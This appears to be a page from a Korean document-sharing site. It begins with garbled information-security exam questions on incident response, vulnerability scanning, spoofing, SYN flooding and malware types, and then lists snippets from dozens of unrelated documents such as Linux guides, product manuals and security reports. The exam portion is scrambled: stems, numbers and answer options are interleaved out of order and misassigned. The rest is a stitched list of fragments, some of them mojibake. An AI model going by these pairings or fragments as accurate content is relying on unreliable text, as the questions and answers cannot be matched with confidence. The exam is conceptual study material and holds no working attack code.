407 228. 취약점 스캐닝에 대하 설명으로 옳지 않은 것은? 232. 다음 중 침해사고의 징후로 볼 수 없는 것 은? 1 취약점 스캐너는 언제라도 인가를 받지 않고 사용한다 2 스캐닝 도구는 때에 따라서 시스템을 다운 시킬 수도 있다 3 스캐닝 도구를 잘 이해하기 전까지는 결론을 내어서는 안 된다 4 주기적으로 수행하여야 한다 229. 직원이 서버 한 대가 네트워크 비정상적으 로 작동되고 있음을 알게 되었고 해당 서버가 외 부 공격에 의해 해킹되지 않았나 의심하고 있다. 해당 직원이 우선 수행하여야할 사항은 무엇인 가? 1 네트워크 상의 다른 서버들을 진단한다. 2 인터넷에서 해당 서버를 분리한다. 3 내부네트워크에서 해당 서버를 분리한다. 4 상위관리자에게 관련 사실을 알린다. 1 침입탐지 시스템의 경보 2 로그파일내의 엔트리 3 로그온 실패와 같은 이벤트 4 시스템 재시작 5 낮은 성능 233. 다음은 침해사고의 제거(Eradication)단계의 유의사항이다. 옳지 않은 것은? 1 네트워크에 다시 접속하기 전에 시스템의 문제를 반드시 해결하여야 함 2 문제의 원인과 징후를 파악해야 함 3 방어 수단을 강화함 4 취약성 분석을 실시함 5 백업을 받음 234. 다음은 침해사고의 복구(Recovery)단계의 유 의사항이다. 옳지 않은 것은? 230. 다음 중 침해사고가 아닌 것은? 1 공격자가 유닉스 시스템을 대상으로 NETBios 스캔을 수행. 2 공격자가 유닉스 시스템의 sendmail 을 해킹함 3 백업 테이프에 중요한 정보가 빠져 있음. 4 자신의 계정정보를 타인에게 알려줌 231. 다음 중 침해사고 대응의 6단계로 분류했을 때 가장 알맞게 기술한 것은? 1 준비(Preparation), 인지(Identification), 견제(Containment),제거(Eradication), 복구(Recovery), 교훈(Lessons Learned) 2 준비(Preparation), 인지(Identification), 접근통제(Access Control), 제거(Eradication), 복구(Recovery), 교훈(Lessons Learned) 3 준비(Preparation), 인증(Authentication), 접근통제(Access Control), 제거(Eradication), 복구(Recovery), 교훈(Lessons Learned) 4 준비(Preparation), 인증(Authentication), 견제 (Containment), 제거(Eradication), 복구 (Recovery), 교훈(Lessons Learned) 1 침해사고가 발생한 데이터로 복원하지 않도록 유의한다 2 백업을 수행한다 3 시스템을 검증한다 4 언제 복원할 지를 결정한다. 5 시스템을 모니터링한다 다음 중 흔히 경험할 수 있는 침해사고의 예로 적절하지 않은 것은? 1 포트 스캐닝 2 서비스거부 공격 3 비인가된 계정 접근 4 접근 통제 236. 다음 중 개인 보안 침해사고에 대한 주요 통제 목표는 무엇인가? 1 피해 최소화 및 침해사고로부터의 교훈 획득 2 대응 시간의 최소화 3 침해사고 대응을 위한 사용자 교육 4 개인에 대한 강력한 법률 관련 처벌 사항의 수립 407
408 237. 침해사고방지를 위해서 준수되어야 할 사 항은? I. 시스템 위험 분석 II. 침해사고대응 담당자 수의 축소 III. 발생 가능성이 높은 이벤트에 대한 평가 IV. 침해사고 대응절차의 수립 V. 보다 효율적인 보안 정책의 작성 1 II, III, 및 IV 2 I, III, 및 IV 3 I, II, 및 III 4 I, II, 및 IV 238. IP 프레그멘테이션(fragmentation) 공격에서 흔히 사용되는 3 가지 기법은? 1 작은 패킷 조각을 이용한 공격, IP 오버플로워 공격, 패킷 중첩 공격 2 패킷 중첩 공격, 대형 패킷 공격, teardrop 공격 3 작은 패킷 조각을 이용한 공격, teardrop 공격, IP 오버플로 공격 4 패킷 중첩 공격, teardrop 공격, 작은 패킷 조각을 이용한 공격 239. 다음 중 공격적인 정보전(Information Warfare)으로 간주되지 않는 것은? 1 첩보활동 2 역공격 3 해킹 4 침입탐지 240. 다음 바이러스 유형 중에서 부트, 파일, 부 트/파일 바이러스라는 기존의 분류에 속하지 않 는 바이러스로 Excel, MS-word, Access, PowerPoint 등을 통해서 감염되며, 실행 파일이 아닌 문서 파일을 감염시키는 바이러스는? 241. 안티바이러스의 보호가 없는 상태에서 바이 러스에 감염되었다면 어떻게 하는 것이 바람직한 가? 1 이메일로 동료들에게 관련사실을 알려준다. 2 컴퓨터를 네트워크로부터 분리하고 시스템 관리자에게 연락을 취한다. 3 데이터를 저장하고 컴퓨터를 재부팅한다. 4 감염파일을 복구하기 위하여 어플리케이션을 재설치 한다 다음 중 어떤 안티바이러스 소프트웨어 방 식이 가장 효과적인 보호를 제공하는가? 1 행위 모니터링 방법 2 스캐닝 방법 3 무결성 검사 방법 4 1),2), 3) 모두 사용 243. 다음 중 정상적인 프로그램이지만 악의적인 작업을 수행하는 숨겨진 기능이 있는 프로그램으 로서 복사기능이나 시스템 속도저하 같은 현상을 일으키지는 않는 악성코드는 무엇인가? 1 웜 2 바이러스 3 조크 4 트로이 목마 244. 컴퓨터를 이용한 정보 시스템을 운영하는 위험 요소를 제어하는 데 가장 중요한 것은 다음 중에서 무엇인가? 1 위협을 유발하는 취약점 2 자산 평가 3 위협의 확인 4 공인과 인가 5 취약점 분석 1 은닉형 바이러스(Stealth Virus) 2 다중 감염 바이러스 (Multi part Virus 또는 Multipartite Virus) 3 매크로 바이러스(Macro Virus) 4 다형성 바이러스(Polymorphic Virus) 408
409 245. 버퍼 오버플로우를 예방하는 방법 중 프로 그래머가 코딩시 입력버퍼의 경계값을 검사하는 안전한 함수를 사용하는 방법이 있다. 다음 중 여기에 해당하지 않는 함수는? 1 strncpy() 2 snprintf() 3 fget() 4 getopt() 246. 다음은 암호 공격 환경에 대한 설명이다. 틀 리게 설명한 것은 무엇인가? 248. SYN 플러딩 공격에 대한 설명으로서 옳지 않은 것은? 1 최신 공격기법이다. 2 IP 주소 변조(Spoofing)와 접목된다. 3 )TCP 3-way 핸그세이킹의 특성을 이용하는 공격이다. 4 서비스 거부 공격의 일종이다 다음 중 취약점 스캐너가 아닌 것은? 1 암호문만을 가지고 키나 평문을 알아내고자 하는 방식을 암호문 단독 공격(Ciphertext Only Attack)이라 한다. 2 공격자가 사전에 동일한 키로 암호화된 여러 개의 암호문과 대응하는 평문 쌍을 획득 한 후 주어진 암호문에 대응하는 평문 또는 키를 알아내고자 하는 방식을 기지 평문 공격 (Known Plaintext Attack)이라 한다. 3 공격자가 임의의 평문을 선택하면 대응하는 암호문을 획득할 수 있는 능력을 보유하고서 주어진 암호문에 대응하는 평문이나 키를 알아내고자 하는 방식을 선택평문공격 (Chosen Plaintext Attack)이라 한다. 4 공격자가 임의의 암호문을 선택하면 대응하는 평문을 획득할 수 있는 능력을 보유하고서 주어진 암호문에 대응하는 평문이나 키를 알아내고자 하는 방식을 선택암호문공격 (Chosen Ciphertext Attack)이라 한다. 5 선택 평문 공격에서 공격자가 주어진 암호문 을 본 후에 평문을 선택하여 암호문을 획득 하고 다시 평문을 선택하여 암호문을 선택 하는 과정을 반복적으로 행하는 경우를 능동 선택 평문 공격(Adaptive Chosen Plaintext Attack)이라 한다 해커가 패킷의 소스 어드레스를 조작하여 공격 받는 시스템으로 하여금 다른 곳에서공격을 받고 있는 것으로 알도록 하는 기법은 다음 중 무엇인가? 1 매스커레이딩(masquerading) 2 플러딩(flooding) 3 스니핑(sniffing) 4 스푸핑(spoofing) 1 CIDF 2 saint 3 nessus 4 nmap 250. 이 기술은 케빈 미트닉(Kevin Mitnick)이 Tsutomu Shimomura의 컴퓨터 시스템을 공격할 때 사용했던 기술이다. 다음 중 옳지 않은 것은? 1 IP 주소 변조(Spoofing) 2 오늘 날에는 더 이상 사용되지 않는다. 3 오늘 날에도 다른 공격과 더불어 사용되고 있다. 4 Syn 플러딩 공격과도 밀접한 관련이 있다 케빈 미트닉(Kevin Mitnick)이 Tsutomu Shimomura의 컴퓨터 시스템을 공격할 때 사용 했던 IP spoofing 공격외에 또 다른 공격 기술은 무엇인가? 1 허니팟 2 TCP 시퀀스 번호 예측 3 패스워드 크랙킹 4 원격 접근 트로이 목마(Trojans) 252. 다음 중 스위치만의 장점으로 가장 적절한 기능은? 1 해당 포트에 접속된 MAC 주소의 추적이 가능하다. 2 스니핑을 어렵게 한다. 3 데이터를 여러 개의 포트로 재전송한다. 4 여러 개의 포트로 전송되는 모든 트래픽을 스니핑할 수 있다. 409
410 253. 다음 중 방화벽을 우회하는 방법은 무엇 인가? I. 악성 코드(Malicious code) II. 백도어(Backdoors) III. 키보드 로깅(Keyboard logging) IV. 비정상 패킷(Malformed packets) 1 I, II, IV 2 I, II, III, IV 3 II, IV 4 I, II 410
리눅스보안관리.PDF
CMOS Boot loader xlock, vlock Boot loader boot: linux single root /etc/lilo.conf restricted password=pickyourpassword /etc/lilo.conf /sbin/lilo Login timeout ~/.bashrc ~/.bash_profile TMOUT=nn Logout ~/.bash_logout
PowerPoint 프레젠테이션
(Host) set up : Linux Backend RS-232, Ethernet, parallel(jtag) Host terminal Target terminal : monitor (Minicom) JTAG Cross compiler Boot loader Pentium Redhat 9.0 Serial port Serial cross cable Ethernet
GNU/Linux 1, GNU/Linux MS-DOS LOADLIN DOS-MBR LILO DOS-MBR LILO... 6
GNU/ 1, qkim@pecetrirekr GNU/ 1 1 2 2 3 4 31 MS-DOS 5 32 LOADLIN 5 33 DOS- LILO 6 34 DOS- 6 35 LILO 6 4 7 41 BIOS 7 42 8 43 8 44 8 45 9 46 9 47 2 9 5 X86 GNU/LINUX 10 1 GNU/, GNU/ 2, 3, 1 : V 11, 2001
<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D313939392D382E687770>
i ii iii iv v vi 1 2 3 4 가상대학 시스템의 국내외 현황 조사 가상대학 플랫폼 개발 이상적인 가상대학시스템의 미래상 제안 5 웹-기반 가상대학 시스템 전통적인 교수 방법 시간/공간 제약을 극복한 학습동기 부여 교수의 일방적인 내용전달 교수와 학생간의 상호작용 동료 학생들 간의 상호작용 가상대학 운영 공지사항,강의록 자료실, 메모 질의응답,
1217 WebTrafMon II
(1/28) (2/28) (10 Mbps ) Video, Audio. (3/28) 10 ~ 15 ( : telnet, ftp ),, (4/28) UDP/TCP (5/28) centralized environment packet header information analysis network traffic data, capture presentation network
Microsoft PowerPoint - comp_prac_081223_2.pptx
Computer Programming Practice (2008 Winter) Practice 2 기본 Unix/Linux 명령어숙지 2008. 12. 23 Contents Linux commands Basic commands File and Directory User Data Filtering Process Etc Conclusion & Recommended
6주차.key
6, Process concept A program in execution Program code PCB (process control block) Program counter, registers, etc. Stack Heap Data section => global variable Process in memory Process state New Running
Sun Java System Messaging Server 63 64
Sun Java System Messaging Server 6.3 64 Sun Java TM System Communications Suite Sun Microsystems, Inc. 4150 Network Circle Santa Clara, CA 95054 U.S.A. : 820 2868 2007 7 Copyright 2007 Sun Microsystems,
Network seminar.key
Intro to Network .. 2 4 ( ) ( ). ?!? ~! This is ~ ( ) /,,,???? TCP/IP Application Layer Transfer Layer Internet Layer Data Link Layer Physical Layer OSI 7 TCP/IP Application Layer Transfer Layer 3 4 Network
Backup Exec
([email protected]) www.veritas veritas.co..co.kr ? 24 X 7 X 365 Global Data Access.. 100% Storage Used Terabytes 9 8 7 6 5 4 3 2 1 0 2000 2001 2002 2003 IDC (TB) 93%. 199693,000 TB 2000831,000 TB.
ORANGE FOR ORACLE V4.0 INSTALLATION GUIDE (Online Upgrade) ORANGE CONFIGURATION ADMIN O
Orange for ORACLE V4.0 Installation Guide ORANGE FOR ORACLE V4.0 INSTALLATION GUIDE...1 1....2 1.1...2 1.2...2 1.2.1...2 1.2.2 (Online Upgrade)...11 1.3 ORANGE CONFIGURATION ADMIN...12 1.3.1 Orange Configuration
Sena Device Server Serial/IP TM Version
Sena Device Server Serial/IP TM Version 1.0.0 2005. 3. 7. Release Note Revision Date Name Description V1.0.0 2005-03-7 HJ Jeon Serial/IP 4.3.2 ( ) 210 137-130, : (02) 573-5422 : (02) 573-7710 email: [email protected]
소개 TeraStation 을 구입해 주셔서 감사합니다! 이 사용 설명서는 TeraStation 구성 정보를 제공합니다. 제품은 계속 업데이트되므로, 이 설명서의 이미지 및 텍스트는 사용자가 보유 중인 TeraStation 에 표시 된 이미지 및 텍스트와 약간 다를 수
사용 설명서 TeraStation Pro II TS-HTGL/R5 패키지 내용물: 본체 (TeraStation) 이더넷 케이블 전원 케이블 TeraNavigator 설치 CD 사용 설명서 (이 설명서) 제품 보증서 www.buffalotech.com 소개 TeraStation 을 구입해 주셔서 감사합니다! 이 사용 설명서는 TeraStation 구성 정보를
SMB_ICMP_UDP(huichang).PDF
SMB(Server Message Block) UDP(User Datagram Protocol) ICMP(Internet Control Message Protocol) SMB (Server Message Block) SMB? : Microsoft IBM, Intel,. Unix NFS. SMB client/server. Client server request
[03] 로그관련명령어 # lastlog /var/log/lastlog 파일의내용을보여주는명령어 /etc/passwd 파일에선언되어있는게정중로그인이되는계정만접근한흔적이남아야한다. 사용자명 포트 ~ 로부터 최근정보 root pts/ 금 10월
[Linux System Log] [01] 리눅스시스템로그현재의시스템에서일어나고있는모든작업이로그파일에기록이된다. 그러므로문제가발생하였을경우가장먼저해야할일이로그분석이다. 로그파일은시비스하고있는상황에따라하루에몇기가씩쌓일수도있다. 이에대해서정확하게분석하는작업과함께주기적으로파일을로테이션시켜부하를줄여야한다. 리눅스의 system log는기본적으로 syslogd(/sbin/syslogd)
untitled
중소기업 정보보호 가이드라인 2006. 4 주 의 사 항 이 가이드라인의 사용에는 어떠한 제한도 없지만 다음과 같은 사항에 주의하여야 합니다. 문서 내에 언급된 상표, 제품명 등에 대한 권리는 각 상표 또는 제품을 소유한 해당 기업에 있으며, 설명을 위해 특정 회사 제품명이나 화면이 표시된 경우 일러두기 에 정의된 가이드라인의 고유 목적 외에 어떠한 다른 목적도
FreeBSD Handbook
FreeBSD Korea FreeBSD Users Group http://www.kr.freebsd.org/ Storage: . 2004 8 7. 1.1 Copyright 1995, 1996, 1997, 1998, 1999, 2000, 2001, 2002, 2003, 2004 The FreeBSD Documentation Project.
MySQL-Ch10
10 Chapter.,,.,, MySQL. MySQL mysqld MySQL.,. MySQL. MySQL....,.,..,,.,. UNIX, MySQL. mysqladm mysqlgrp. MySQL 608 MySQL(2/e) Chapter 10 MySQL. 10.1 (,, ). UNIX MySQL, /usr/local/mysql/var, /usr/local/mysql/data,
1. efolder 시스템구성 A. DB B. apache - mod-perl - PHP C. SphinxSearch ( 검색서비스 ) D. File Storage 2. efolder 설치순서 A. DB (MySQL) B. efolder Service - efolder
Embian efolder 설치가이드 efolder 시스템구성 efolder 설치순서 Installation commands 1. efolder 시스템구성 A. DB B. apache - mod-perl - PHP C. SphinxSearch ( 검색서비스 ) D. File Storage 2. efolder 설치순서 A. DB (MySQL) B. efolder
untitled
Push... 2 Push... 4 Push... 5 Push... 13 Push... 15 1 FORCS Co., LTD A Leader of Enterprise e-business Solution Push (Daemon ), Push Push Observer. Push., Observer. Session. Thread Thread. Observer ID.
PCServerMgmt7
Web Windows NT/2000 Server DP&NM Lab 1 Contents 2 Windows NT Service Provider Management Application Web UI 3 . PC,, Client/Server Network 4 (1),,, PC Mainframe PC Backbone Server TCP/IP DCS PLC Network
OPCTalk for Hitachi Ethernet 1 2. Path. DCOMwindow NT/2000 network server. Winsock update win95. . . 3 Excel CSV. Update Background Thread Client Command Queue Size Client Dynamic Scan Block Block
LN_5_Rootfs
프로젝트 2 Root Filesystem 단국대학교 컴퓨터학과 2009 백승재 [email protected] http://embedded.dankook.ac.kr/~baeksj Ramdisk 에대한이해 강의목표 Root filesystem 의구조이해 Root filesystem 제작과정이해 Ramdisk 기반 root filesystem 제작 3 RAMdisk?
Subnet Address Internet Network G Network Network class B networ
Structure of TCP/IP Internet Internet gateway (router) Internet Address Class A Class B Class C 0 8 31 0 netid hostid 0 16 31 1 0 netid hostid 0 24 31 1 1 0 netid hostid Network Address : (A) 1 ~ 127,
*****
Korea Internet & Security Agency 21 2 본 보고서 내용의 전부나 일부를 인용하는 경우에는 반드시 출처 [자료:한국인터넷진흥원 인터넷침해대응센터]를 명시하여 주시기 바랍니다. CONTENTS 1 2 2 2 3 3 4 5 5 6 6 7 9 1 12 12 13 13 14 16 18 2 21 22 22 34 37 38 1 212 Bot
본 해설서는 정보통신망 이용촉진 및 정보보호 등에 관한 법률 (이하 법 이라 한다) 제28조제1항과 같은 법 시행령 제15조제6항에 근거한 개인정보의 기술적 관리적 보호조치 기준 이 개정 고시(2009.8.7)됨에 따라 - 동 기준의 각 조항별 주안점과 구체적인 사례를
2009. 9 본 해설서는 정보통신망 이용촉진 및 정보보호 등에 관한 법률 (이하 법 이라 한다) 제28조제1항과 같은 법 시행령 제15조제6항에 근거한 개인정보의 기술적 관리적 보호조치 기준 이 개정 고시(2009.8.7)됨에 따라 - 동 기준의 각 조항별 주안점과 구체적인 사례를 제시함으로써 해석상 오해의 소지를 없애고, - 동 기준에 대한 올바른 이해를
Remote UI Guide
Remote UI KOR Remote UI Remote UI PDF Adobe Reader/Adobe Acrobat Reader. Adobe Reader/Adobe Acrobat Reader Adobe Systems Incorporated.. Canon. Remote UI GIF Adobe Systems Incorporated Photoshop. ..........................................................
TCP.IP.ppt
TCP/IP TCP/IP TCP/IP TCP/IP TCP/IP Internet Protocol _ IP Address Internet Protocol _ Subnet Mask Internet Protocol _ ARP(Address Resolution Protocol) Internet Protocol _ RARP(Reverse Address Resolution
휠세미나3 ver0.4
andromeda@sparcs:/$ ls -al dev/sda* brw-rw---- 1 root disk 8, 0 2014-06-09 18:43 dev/sda brw-rw---- 1 root disk 8, 1 2014-06-09 18:43 dev/sda1 brw-rw---- 1 root disk 8, 2 2014-06-09 18:43 dev/sda2 andromeda@sparcs:/$
LXR 설치 및 사용법.doc
Installation of LXR (Linux Cross-Reference) for Source Code Reference Code Reference LXR : 2002512( ), : 1/1 1 3 2 LXR 3 21 LXR 3 22 LXR 221 LXR 3 222 LXR 3 3 23 LXR lxrconf 4 24 241 httpdconf 6 242 htaccess
1 Live CD(USB) 란? 1.1 Live CD(USB) 란? LiveCD(USB) 란 CD( 또는 USB) 를하드디스크로인식하여해당매체를기반으로동작하는운영체제를말한다. 즉 CD에설치된운영체제이다. 이는자신의 PC의하드디스크에설치된내용은 CD에그대로복사하였다고생각
서버패키지 CD 개발 손춘호 [email protected] 목차 1 Live CD(USB) 란?... 2 1.1 Live CD(USB) 란?... 2 2 Live CD(USB) 만들기... 3 2.1 자신만의운영체제설치하기... 3 2.2 Live CD 만들기... 3 3 Live CD(USB) 굽기... 10 3.1 CD에굽기... 10 3.2 USB에굽기...
침입방지솔루션도입검토보고서
IT 2005. 06. 02. IT IT Windows 3503 4463 4178 64% Solaris 142 56 36 Digital UX 37 24 9 Tru64 30 20 26 Server & DeskTop UNIX HP-UX 27 IRIX 19 FreeBSD 12 7 15 8 5 17 9 2% AIX 5 3 3 Linux 348 400 516 8% Apple
o o o 8.2.1. Host Error 8.2.2. Message Error 8.2.3. Recipient Error 8.2.4. Error 8.2.5. Host 8.5.1. Rule 8.5.2. Error 8.5.3. Retry Rule 8.11.1. Intermittently
슬라이드 제목 없음
< > Target cross compiler Target code Target Software Development Kit (SDK) T-Appl T-Appl T-VM Cross downloader Cross debugger Case 1) Serial line Case 2) LAN line LAN line T-OS Target debugger Host System
Specialist for Information Security
이 름 : 최상길 나 이 : 6 살 E - M a i l : [email protected] 현 재 직 업 : 군인 ( 정보보호기술병) 제작자 프로필 주요 업무 내용 : 서버 및 네트워크 취약점 분석, Storage 설정 및 관리, ESM & EMS & IDS & IPS & TAS & Fire Wall & Virus Wall 등 Security System 운영
제20회_해킹방지워크샵_(이재석)
IoT DDoS DNS ([email protected]) (www.sherpain.net) DDoS DNS DDoS / DDoS(Distributed DoS)? B Asia Broadband B Bots connect to a C&C to create an overlay network (botnet) C&C Provider JP Corp. Bye Bye!
ESP1ºÎ-04
Chapter 04 4.1..,..,.,.,.,. RTOS(Real-Time Operating System)., RTOS.. VxWorks(www.windriver.com), psos(www.windriver.com), VRTX(www.mento. com), QNX(www.qnx.com), OSE(www.ose.com), Nucleus(www.atinudclus.
<4D6963726F736F667420576F7264202D20B3BBBACEC7D8C5B7B4EBC8B820BAB8B0EDBCAD2E646F6378>
HUST 내부해킹대회 보고서 Uprising 팀원: 이규현, 김정주, 장민석, 송진기 Network.1 문제 파일을 UltraEdit으로 열어보니 ip가 적혀있고 통신내용인 것 같은 내용들이 포함되어있어 Wireshark로 열어보니 패킷들이 캡쳐되어있었다. Wireshark에서 Follow TCP Stream을 이용해 통신 내용을 보는데 일부가 인코드된 Base64
hd1300_k_v1r2_Final_.PDF
Starter's Kit for HelloDevice 1300 Version 11 1 2 1 2 3 31 32 33 34 35 36 4 41 42 43 5 51 52 6 61 62 Appendix A (cross-over) IP 3 Starter's Kit for HelloDevice 1300 1 HelloDevice 1300 Starter's Kit HelloDevice
untitled
CAN BUS RS232 Line Ethernet CAN H/W FIFO RS232 FIFO IP ARP CAN S/W FIFO TERMINAL Emulator COMMAND Interpreter ICMP TCP UDP PROTOCOL Converter TELNET DHCP C2E SW1 CAN RS232 RJ45 Power
Solaris Express Developer Edition
Solaris Express Developer Edition : 2008 1 Solaris TM Express Developer Edition Solaris OS. Sun / Solaris, Java, Web 2.0,,. Developer Solaris Express Developer Edition System Requirements. 768MB. SPARC
CLX8380_KR.book
이 사용설명서와 제품은 저작권법에 의해 보호되어 있습니다. 삼성전자 ( 주 ) 의 사전 서면 동의 없이 사용설명서 및 제품의 일부 또는 전체를 복사, 복제, 번역 또는 전자매체나 기계가 읽을 수 있는 형태로 바꿀 수 없습니다. 이 사용설명서와 제품은 표기상의 잘못이나 기술적인 잘못이 있을 수 있으며 사전 통보 없이 이러한 내용들이 변경될 수 있습니다. CLX-8380ND,
PWR PWR HDD HDD USB USB Quick Network Setup Guide xdsl/cable Modem PC DVR 1~3 1.. DVR DVR IP xdsl Cable xdsl Cable PC PC DDNS (
PWR PWR HDD HDD USB USB Quick Network Setup Guide xdsl/cable Modem PC DVR 1~3 1.. DVR DVR IP xdsl Cable xdsl Cable PC PC DDNS (http://ddns.hanwha-security.com) Step 1~5. Step, PC, DVR Step 1. Cable Step
Microsoft Word - UG-BetaDraft_KO_TT-OK.doc
DocuPrint C2090 FS 사용설명서 Adobe, Adobe 로고, Acrobat Reader는 Adobe Systems Incorporated의 상표입니다. Microsoft, Windows, Windows Server는 미국 및/또는 다른 나라의 Microsoft Corporation의 등록상표 또 는 상표입니다. 소프트웨어 스크린 샷을 사용하는
<32303132B3E2C1A632C8B8BFF6B5E531B1DE42C7FC2E687770>
국 가 기 술 자 격 검 정 무 단 전 재 금 함 형별 제한 시간 수험번호 성 명 다음 문제를 읽고 가장 알맞은 것을 골라 답안카드의 답란 (1, 2, 3, 4)에 표기하시오 워드프로세싱 용어 및 기능 1. 다음 중 워드프로세서의 입력 기능에 대한 설명으로 옳지 1 행두 금칙 문자로는 (, [,,< 등이 있다. 2 KS X 1001 완성형 한글
chapter4
Basic Netw rk 1. ก ก ก 2. 3. ก ก 4. ก 2 1. 2. 3. 4. ก 5. ก 6. ก ก 7. ก 3 ก ก ก ก (Mainframe) ก ก ก ก (Terminal) ก ก ก ก ก ก ก ก 4 ก (Dumb Terminal) ก ก ก ก Mainframe ก CPU ก ก ก ก 5 ก ก ก ก ก ก ก ก ก ก
ÀÎÅÍ³Ý ÁøÈï¿ø 3¿ù ÀúÇØ»ó
Korea Internet & Security Agency 21 3 CONTENTS 1 2 2 2 3 3 4 5 5 6 6 7 9 1 12 12 13 13 14 16 18 2 21 22 22 31 34 35 1 213 Bot 1,85 1,32 16.7 1,53 1,76 12.1 222 317 3. 116 16 9.4% 345 23 5.% 267 233 14.6%
포렌식특강발표자료
본자료는기관외타인에게내용에대해서인용및반출을금합니다 사이버포렌식개요및실제사례적용 어울림 NGS 기술 1 팀 / 포렌식팀장 서울디지털대학교류동주교수 목차 C ontents 1.System Forensics 2. 안티포렌식 2 System Forensics 포렌식 개요 정의 실세계에서범죄를수사할때적용되는법의학적수사기법을적용하여컴퓨터범죄 (computer crime)
PowerPoint 프레젠테이션
Reasons for Poor Performance Programs 60% Design 20% System 2.5% Database 17.5% Source: ORACLE Performance Tuning 1 SMS TOOL DBA Monitoring TOOL Administration TOOL Performance Insight Backup SQL TUNING
자바-11장N'1-502
C h a p t e r 11 java.net.,,., (TCP/IP) (UDP/IP).,. 1 ISO OSI 7 1977 (ISO, International Standards Organization) (OSI, Open Systems Interconnection). 6 1983 X.200. OSI 7 [ 11-1] 7. 1 (Physical Layer),
vm-웨어-01장
Chapter 16 21 (Agenda). (Green),., 2010. IT IT. IT 2007 3.1% 2030 11.1%, IT 2007 1.1.% 2030 4.7%, 2020 4 IT. 1 IT, IT. (Virtualization),. 2009 /IT 2010 10 2. 6 2008. 1970 MIT IBM (Mainframe), x86 1. (http
1. GigE Camera Interface를 위한 최소 PC 사양 CPU : Intel Core 2 Duo, 2.4GHz이상 RAM : 2GB 이상 LANcard : Intel PRO/1000xT 이상 VGA : PCI x 16, VRAM DDR2 RAM 256MB
Revision 1.0 Date 11th Nov. 2013 Description Established. Page Page 1 of 9 1. GigE Camera Interface를 위한 최소 PC 사양 CPU : Intel Core 2 Duo, 2.4GHz이상 RAM : 2GB 이상 LANcard : Intel PRO/1000xT 이상 VGA : PCI x
USB USB DV25 DV25 REC SRN-475S REC SRN-475S LAN POWER LAN POWER Quick Network Setup Guide xdsl/cable Modem PC DVR 1~3 1.. DVR DVR IP xdsl Cable xdsl C
USB USB DV25 DV25 REC SRN-475S REC SRN-475S LAN POWER LAN POWER Quick Network Setup Guide xdsl/cable Modem PC DVR 1~3 1.. DVR DVR IP xdsl Cable xdsl Cable PC PC Step 1~5. Step, PC, DVR Step 1. Cable Step
05Àå
CHAPTER 05 NT,, XP,. NT NTFS, XP. D,,. XP x NT,,, ( x, x ). NT/ /XP,.. PC NT NT. + Guide to Software: Understanding and Installing Windows 2000 and Windows NT + SOFTWARE Guide to Software 3/e SOFTWARE
UDP Flooding Attack 공격과 방어
황 교 국 ([email protected]) SK Infosec Co., Inc MSS Biz. Security Center Table of Contents 1. 소개...3 2. 공격 관련 Protocols Overview...3 2.1. UDP Protocol...3 2.2. ICMP Protocol...4 3. UDP Flood Test Environment...5
wp1_120616.hwp
1과목 : 워드프로세싱 용어 및 기능 1. 다음 중 문서의 효력 발생에 대한 견해로 우리나라에서 채택하 고 있는 1 표백주의 2 발신주의 3 도달주의 4 요지주의 2. 다음 중 워드프로세서의 표시기능에 대한 설명으로 옳은 1 포인트는 화면을 구성하는 최소 단위로 1포인트는 보통 0.5mm이다. 2 자간이란 문자와 문자 사이의 간격을 의미하며 자간을 조절 하여
운영체제실습_명령어
운영체제실습 리눅스네트워크기본개념및설정 서 기옥 Contents 네트워크용어정의 IP 주소 네트워크기본명령어 네트워크관리명령어 네트워크설정파일 telnet 서버설정 네트워크용어정의 네트워크 (Network) : 전자적으로데이터를주고받기위한목적으로연결된 2 개이상의컴퓨터시스템 IP 주소와 Ethernet 주소 IP 주소 : 네트워크에연결된시스템을구분하는소프트웨어적인주소
*
Korea Internet & Security Agency 29 12 CONTENTS 1 3 4 5 6 6 7 9 1 13 14 16 18 23 56 59 61 Windows XP SP1 Windows 2 SP4 1 2912 Bot 326 49 2.3 73 73 239 215 11.2% 256 199 28.6% 25 115 117.4% Bot 8,469 46
다. 최신 버전의 rpm 패키지 버전을 다운로드해 다음과 같이 설 치한다. 단 debuginfo의 rpm 패키지는 설치할 필요가 없다. 하기 위한 옵션이고, init는 저장소를 초기화하기 위한 cvs 명령 어이다. - 새로 설치한 경우 : rpm -ivh cvs* -
개발자를 위한 리눅스 유틸리티 활용법 CVS를 이용한 프로젝트 관리 연재의 마지막 시간에는 리눅스의 소스 버전 관리를 위한 툴을 소개한다. 이 툴은 흔히 형상 관리 시스템, 버전 관리 시스템이라고 일컬어진다. 윈도우나 리눅스 시스템 환경에는 여러 가지 형상 관 리 시스템이 존재하는데 여기서는 현재 오픈소스로 널리 알려진 CVS에 대해 살펴본다. 4 연 재 순
chapter1,2.doc
JavaServer Pages Version 08-alpha copyright2001 B l u e N o t e all rights reserved http://jspboolpaecom vesion08-alpha, UML (?) part1part2 Part1 part2 part1 JSP Chapter2 ( ) Part 1 chapter 1 JavaServer
ESET Endpoint Security
ESET ENDPOINT SECURITY 사용자 설명서 Microsoft Windows 8 / 7 / Vista / XP / 2000 / Home Server 이 문서의 최신 버전을 다운로드하려면 여기를 클릭 ESET ENDPOINT SECURITY Copyright 2013 by ESET, spol. s r. o. ESET Endpoint Security는
<4D6963726F736F667420506F776572506F696E74202D2030342E20C0CEC5CDB3DD20C0C0BFEB20B9D720BCADBAF1BDBA20B1E2BCFA2831292E70707478>
웹과 인터넷 활용 및실습 () (Part I) 문양세 강원대학교 IT대학 컴퓨터과학전공 강의 내용 전자우편(e-mail) 인스턴트 메신저(instant messenger) FTP (file transfer protocol) WWW (world wide web) 인터넷 검색 홈네트워크 (home network) Web 2.0 개인 미니홈페이지 블로그 (blog)
PowerPoint 프레젠테이션
UNIX 및실습 8 장. 프로세스와사용자 명령익히기 1 학습목표 유닉스에서프로세스가무엇인지그개념을이해한다. 프로세스와관련된유닉스명령의사용방법을익힌다. 포그라운드처리와백그라운드처리의차이를이해한다. 사용자정보를보는명령의사용방법을익힌다. 2 01. 프로세스의개념과종류 프로세스 (process) 현재시스템에서실행중인프로그램 프로세스는고유번호를가진다. Process
PowerPoint Presentation
Data Protection Rapid Recovery x86 DR Agent based Backup - Physical Machine - Virtual Machine - Cluster Agentless Backup - VMware ESXi Deploy Agents - Windows - AD, ESXi Restore Machine - Live Recovery
Mango220 Android How to compile and Transfer image to Target
Mango220 Android How to compile and Transfer image to Target http://www.mangoboard.com/ http://cafe.naver.com/embeddedcrazyboys Crazy Embedded Laboratory www.mangoboard.com cafe.naver.com/embeddedcrazyboys
6강.hwp
